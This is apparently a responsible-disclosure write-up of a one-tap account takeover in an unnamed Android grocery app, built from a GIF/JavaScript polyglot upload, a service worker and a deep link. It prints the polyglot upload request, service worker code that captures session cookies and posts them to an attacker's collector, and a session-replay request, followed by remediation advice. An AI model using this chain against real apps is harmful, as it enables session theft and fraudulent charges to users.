A while ago I was testing an Android grocery-delivery app and got stuck on the image upload. You attach a picture to a list, it goes to their servers, and it comes back as a clean thumbnail. I wondered whether I could hide code in one of these. That question took a few days and several dead-ends to answer.
Psst: the version of me who wrote “image upload: probably a dead end” in his notes owes the one who kept poking a beer. Two of the three biggest steps here looked worthless until they weren’t.
One tap, full takeover: One ordinary HTTPS link runs my JavaScript inside any user’s logged-in app WebView, hands me their session, and lets me change their phone number, disable their notifications, and place an order on their saved card, shipped to me. It needs no password and one tap. I’ve kept the vendor unnamed and the details generic. I care about the shape of the bug, not who had it.
Trying to hide code in an image
I started with the obvious approach and uploaded HTML directly. I set Content-Type: text/plain, replaced the JPEG bytes with my text, and named the file .html. The server returned an error. It reads the first few bytes for an image magic header and rejects a body that doesn’t start like an image. So the server runs a real content check on upload rather than trusting the Content-Type.
Next I tried hiding the code in a real image’s metadata. I built a JPEG with a payload in an EXIF field and uploaded it. The server returned 200. Then I downloaded the image back from the app to see what survived. The metadata was gone, and the image was clean.
That download taught me something. The picture the app shows me is not the file I uploaded, because something re-encoded it. An image proxy sits in front of storage. Every image URL carries resize and optimize parameters (width, format, optimize), which is how one of those proxies looks. The app requests the picture, the proxy decodes it, and the proxy returns a fresh image at the size it wants. Anything that isn’t pixel data, including EXIF and trailing bytes, does not survive. That discarded my metadata.
The stored copy: Metadata smuggling failed because the proxy re-encodes whatever the app renders. But it re-encodes from the stored object. So my next question was whether that stored object still held my exact upload.
Appending the code after the image
I kept a valid JPEG header to pass the magic-byte check and appended my HTML after the image bytes. I uploaded it, and the server returned 200.
The picture displays fine in the app. It looks like a clean image, because the app shows the re-encoded copy and my appended bytes are not pixel data. Testing only the app would have ended the investigation here.
The re-encoded copy is one of two ways to reach the file. The raw stored object still sits on the image host. I requested the storage URL directly, and the server served it as .html and rendered my markup as a page. The header passes the magic-byte check, the server stores everything after the header verbatim and returns it unchanged, and the filename sets the served type. The app shows a clean thumbnail while the storage origin serves my HTML.
That duality is the whole finding. The same upload, two different things depending on which copy you ask for:
- What the app renders: A clean thumbnail re-encoded by the proxy. EXIF is stripped, appended bytes are gone, and it looks harmless.
- What the storage origin serves: The raw stored object. The header passed the check, everything after it is returned verbatim, and the filename determines the type. My script is served as active content.
I then tried to name the file .js and upload JavaScript, and that failed on its own. So I built a polyglot. The body starts with GIF89a—a GIF magic passes the check as well as a JPEG magic, which I confirmed here—followed by my script, and the filename ends in .gif;.js. The server takes the extension from the filename, stores the file as .js, and serves it as text/javascript. The file enters as an image and leaves as executable JavaScript.
POST /api/v1/.../image/ HTTP/2
Host: <app-api-host>
Cookie: sessionid=<attacker-session>
Content-Type: multipart/form-data; boundary=BOUNDARY
--BOUNDARY
Content-Disposition: form-data; name="image"; filename="<uuid>.gif;.js"
Content-Type: image/gif
GIF89a...<arbitrary JS body>
--BOUNDARY--
I can now place HTML and JavaScript on the image host and have the server serve both as active content.
The three ways I tried to smuggle code in, and what each one did:
Upload raw HTML: rejected
Content-Type: text/plain
filename="payload.html"
<html>… my markup …</html>
The server reads the first bytes for an image magic header and returns an error. The Content-Type is ignored; a real content check runs on upload.
Hide it in EXIF: stripped
JPEG header … EXIF.Comment = <script>…</script>
Upload returns 200, but the image proxy re-encodes from pixels alone. Download it back and the EXIF is gone. The payload never survives to a viewer.
Append after an image: stored
GIF89a …<my JS> filename="<uuid>.gif;.js"
A valid magic header passes the check, everything after it is stored verbatim, and the filename sets the served type. The raw object comes back as text/javascript. This is the one.
The point where the finding looks worthless
I got stuck here for a while. I had XSS on the image subdomain, something like images.app.example. The app’s session cookies live on app.example, and they do not reach the image subdomain. My code runs on an origin that cannot read anything worth stealing, and the cross-site boundary does its job.
Looks like a dead end: I could host a phishing page on that origin, but XSS on an image CDN that cannot read the session is not a takeover and pays nothing. The origin boundary blocked everything I wanted.
The service worker workaround
A service worker solved it. You register a service worker from a page, and it sits in front of the requests to that origin and reads them, including their headers. The session material I want—the session cookie and a session header the app sets on its own requests—rides on the requests the WebView makes to the image host. I do not read the cookie across an origin boundary. I make my worker the component the request passes through.
The plan: open my page on the image host, register a service worker, trigger a navigation the worker can intercept, and read the session from that request. The worker’s fetch handler does the work. I trimmed the webhook and header list:
self.addEventListener("fetch", (event) => {
const capture = {};
for (const name of ["cookie", "x-set-session"]) {
const value = event.request.headers.get(name);
if (value) capture[name] = value;
}
if (capture.cookie) {
const match = /(?:^|;\s*)sessionid=([^;]+)/.exec(capture.cookie);
if (match) capture.sessionid = match[1];
}
if (Object.keys(capture).length) {
event.waitUntil(post("session-capture", capture));
}
});
A launcher page registers the worker, waits for it to activate, and navigates so the worker sees the request:
navigator.serviceWorker.register(SW_PATH)
.then(() => navigator.serviceWorker.ready)
.then(() => { location.href = currentAuthorityUrl(TARGET_PATH); });
This works only when the page runs inside the app’s WebView, where those requests carry the session. That set up the final problem.
No one taps images.app.example
To capture an app session, my page has to open inside the app’s WebView, the surface that carries the session, rather than a browser tab. The app loads certain links in that WebView. But my link points at the image host, and no one taps images.app.example/llsag0klag…html. The URL looks wrong, and users trust the app.example domain. I needed a sink on the trusted surface that carries a victim into the app’s WebView and then to my page. This part took days.
I found the app’s deep-link provider, one of the third-party smart-link attribution services that many mobile apps use. One of these links is a plain HTTPS link on the provider’s own domain that carries a deep-link value. When the app is installed, the provider resolves the value, hands the path to the app, and the app opens it in the WebView. The link uses no custom scheme, no intent URL, and no permission prompt. The victim sees a normal HTTPS link, and it reaches my page inside the app with the session attached.
Confirming it runs in the app, not the browser
I had to confirm the link opens in the app’s WebView rather than a browser tab, because a browser tab carries no session on the request. adb confirms it:
adb shell am start -W -a android.intent.action.VIEW \
-c android.intent.category.BROWSABLE \
-d '<https-deep-link>'
Status: ok
LaunchState: COLD
Activity: <app-package>/.app.MainActivity
topResumedActivity = <app-package>/.app.MainActivity
The resolved activity is the app’s own main activity. I ran the launch again with Chrome, Samsung Internet, and Firefox each set as the default browser, and all three route the link into the app and fire the capture. The request that reaches my collector carries an X-Requested-With value naming the app package and a wv WebView User-Agent, which confirms the same result from the other side. The code ran inside the app.
Not self-XSS: I used two accounts on two devices. Account A, which I control, uploads the files. Account B, the victim, logs into the app on a different device and taps the link. Account B’s session cookie and session header reach my collector.
What the session gives an attacker
I replayed the captured session from a separate client with no app and no device, using only the cookie:
GET /api/v1/user/session/ HTTP/2
Host: <app-api-host>
Cookie: sessionid=<captured-victim-session>
The server responds as the victim. From there, using the session and no password, I did three things:
- I changed the victim’s phone number to mine (
PATCHon the profile endpoint,200). Every SMS the service sends after that, including delivery notices and order-deadline reminders, reaches me. - I disabled push, SMS, and email (
PATCHon the comms-preferences endpoint,200). Combined with the phone redirect, the victim sees none of the fraud in real time. - I filled a cart, set delivery to my address, and checked out on the victim’s saved card. The server confirmed the order.
The charge is real: The card data never leaks, because the app references the saved method server-side. But the charge on the victim is real, and the groceries reach my door.
- Taps to takeover: 1
- Password needed: None
- Exposed: Any Android user
The whole chain, one step at a time
Each piece looked ordinary in isolation. Together they line up across the trust boundary:
- I upload a GIF/JS polyglot to my own list. The
GIF89aheader passes the magic-byte check, and the filename sets the served type. - It lands on the image host. The raw stored object serves my code as
text/javascript, active content on an origin the app treats as first-party. - The victim taps an ordinary HTTPS deep link. No custom scheme, no prompt. The app opens my page inside its logged-in WebView.
- My service worker sits in front of the WebView’s requests and reads the session cookie and header. This is not a cross-origin read: I became the component the request passes through.
- The worker posts the captured session to my collector.
- I replay the session from anywhere—no app, no device, no password—to change the phone number, kill the alerts, and check out on the saved card.
Why this exceeds a normal stored XSS
Two factors raise the XSS to a one-click takeover.
The delivery is a plain HTTPS link on a domain the app already handles. It uses no custom scheme, no intent URL, and no install or permission prompt, and it works with any default browser. It looks the same as any other link a user might receive by text or email, which makes it a phishing primitive at scale. Every Android user of the app sits one tap away, and uploading the payload costs a free account.
The bug breaks a real boundary. The app treats its image host as first-party and lets that origin run in the logged-in WebView. Any user with a free account puts active content on that origin. Once user uploads and the trusted app surface share an origin, an image host serves attacker code to logged-in users.
Remediation
No single layer fixes this, so the team should apply several together.
Stop serving user uploads as active content—the root cause. Re-encode uploads server-side to a real image such as PNG, JPEG, or WebP. That re-encode already cleans the displayed copy, so serve only that output. Respond with a safe image Content-Type and X-Content-Type-Options: nosniff. Reject any body whose magic bytes fall outside an image allow-list. Derive the stored extension from the validated type and ignore the client filename.
Stop user uploads from sharing an origin with the trusted app surface. If HTML and JavaScript uploads have to exist, serve them from a separate cookieless origin that sits outside the app’s WebView trust set and never receives the session cookie, and block service worker registration there.
Tighten the WebView trust boundary. The logged-in WebView should load only known first-party paths, and a deep link that points at an arbitrary image-host path should open in a Custom Tab with no session, or fail.
Add step-up authentication on sensitive actions. Require it for a phone-number change, notification settings, a delivery-address change on an existing order, and checkout on a saved card when the session arrives from a different device or network than the active app session. That layer limits a stolen session.
Every piece was ordinary
Every piece of this chain is ordinary: a lenient upload filter, a proxy that re-encodes the display copy and hides the payload in the app, a filename that sets its own extension, a service worker that reads request headers, a deep link that lands in a WebView. Several pieces looked like dead ends alone. The append trick looked clean in the app, and the XSS looked worthless on a cookieless subdomain. Each step came down to two questions: what does the other copy do, and what can sit in front of that request.
The chain became a one-click takeover because the pieces lined up across a trust boundary, and my bytes reached an origin the app treats as itself. Keep the user-upload host and the origin your logged-in app trusts on separate origins. Once they match, a user uploads an image and runs code in other users’ sessions.
Outcome: The vendor responded well, accepted the chain, and has since fixed it.
Why blocking the .js extension would not have saved them
Every single-layer patch here is bypassable. Block .js and a polyglot with a different active type (.html, .svg) walks in. Strip one magic header and the allow-list of accepted image magics—GIF and JPEG—gives another. Filter the filename and content-sniffing can still promote the body to active content without nosniff. The only durable fixes are structural: re-encode-and-serve-only-that, and a separate cookieless origin outside the WebView trust set. Those two remove the primitive instead of naming yesterday’s payload.
References and further reading
- File upload vulnerabilities — PortSwigger’s labs on magic-byte checks, polyglots, and content-type confusion.
- Service Worker API — MDN’s documentation for the fetch-interception model this chain abuses.
- Unrestricted File Upload — OWASP’s overview of the root-cause class and defensive checklist.